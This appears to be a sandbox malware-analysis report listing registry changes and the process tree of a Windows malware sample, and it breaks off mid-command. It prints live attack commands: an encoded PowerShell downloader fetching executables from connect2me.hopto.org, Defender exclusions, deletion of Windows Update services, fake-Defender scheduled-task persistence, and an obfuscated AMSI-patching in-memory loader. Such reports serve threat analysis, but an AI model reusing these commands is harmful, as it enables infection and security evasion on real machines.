| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={CBAD3673-59B1-4CAE-9103-3B3D1CDA7408}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe
"C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3156 -ip 3156
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 272
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3644 -ip 3644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 304
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:fXmkdWYoERIJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EZjRCMFniXUbOn,[Parameter(Position=1)][Type]$RmZBzzPCdT)$AkIMCMeSXuK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+'cte'+[Char](100)+''+[Char](68)+''+'e'+'l'+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+'le'+[Char](103)+'a'+'t'+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+'Publ'+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+','+'A'+'n'+''+'s'+''+[Char](105)+'C'+'l'+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+'oC'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$AkIMCMeSXuK.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$EZjRCMFniXUbOn).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'nage'+'d'+'');$AkIMCMeSXuK.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+'i'+[Char](100)+''+'e'+'B'+'y'+'S'+[Char](105)+'g'+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+'ua'+[Char](108)+'',$RmZBzzPCdT,$EZjRCMFniXUbOn).SetImplementationFlags('R'+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $AkIMCMeSXuK.CreateType();}$OffthJbTxethX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+'t'+'e'+'m.dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+'o'+'s'+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+'.'+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'O'+''+[Char](102)+''+[Char](102)+''+[Char](116)+''+[Char](104)+''+[Char](74)+'b'+'T'+'x'+[Char](101)+''+'t'+''+'h'+''+[Char](88)+'');$sCraBEMaglUJGK=$OffthJbTxethX.GetMethod('sCr'+[Char](97)+''+[Char](66)+'E'+'M'+''+[Char](97)+''+[Char](103)+'lU'+'J'+''+[Char](71)+''+'K'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jyZkyjveqhWBSswVAiG=fXmkdWYoERIJ @([String])([IntPtr]);$OcOrdAJyeTQHcNvZasYnNK=fXmkdWYoERIJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uEajDNToGKp=$OffthJbTxethX.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+''+'e'+'H'+[Char](97)+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+'.'+'d'+'l'+''+[Char](108)+'')));$ehZgshNqKNHoEK=$sCraBEMaglUJGK.Invoke($Null,@([Object]$uEajDNToGKp,[Object](''+[Char](76)+'oa'+[Char](100)+''+[Char](76)+''+'i'+''+'b'+''+'r'+''+'a'+''+'r'+''+'y'+'A')));$VqELaMlKvqjMoiQgE=$sCraBEMaglUJGK.Invoke($Null,@([Object]$uEajDNToGKp,[Object](''+[Char](86)+'i'+[Char](114)+''+'t'+''+'u'+'al'+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+'e'+''+[Char](99)+''+'t'+'')));$nlJeFpj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ehZgshNqKNHoEK,$jyZkyjveqhWBSswVAiG).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$TJIfrViZzqARzjblI=$sCraBEMaglUJGK.Invoke($Null,@([Object]$nlJeFpj,[Object](''+'A'+'m'+'s'+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+'B'+[Char](117)+''+'f'+''+'f'+''+'e'+''+'r'+'')));$qmWzAuRwlW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VqELaMlKvqjMoiQgE,$OcOrdAJyeTQHcNvZasYnNK).Invoke($TJIfrViZzqARzjblI,[uint32]8,4,[ref]$qmWzAuRwlW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$TJIfrViZzqARzjblI,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VqELaMlKvqjMoiQgE,$OcOrdAJyeTQHcNvZasYnNK).Invoke($TJIfrViZzqARzjblI,[uint32]8,0x20,[ref]$qmWzAuRwlW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+''+'r'+''+'s'+'t'+[Char](97)+'ge'+'r'+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MRBJKUEqLqZF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QkwglhEQDrqDnv,[Parameter(Position=1)][Type]$ZSHuKpULPU)$RDPsayfglCA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'efle'+[Char](99)+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+'M'+[Char](111)+''+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+'e'+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+'eTy'+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+''+[Char](117)+'bl'+'i'+''+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+'s'+''+[Char](105)+'Cl'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RDPsayfglCA.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+'c'+'i'+'a'+[Char](108)+''+'N'+''+[Char](97)+'m'+'e'+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+'B'+'yS'+'i'+''+'g'+''+','+''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$QkwglhEQDrqDnv).SetImplementationFlags(''+[Char](82)+'u'+'n'+'ti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$RDPsayfglCA.DefineMethod(''+'I'+''+'n'+'v'+'o'+'k'+[Char](101)+'',''+[Char](80)+'u'+'b'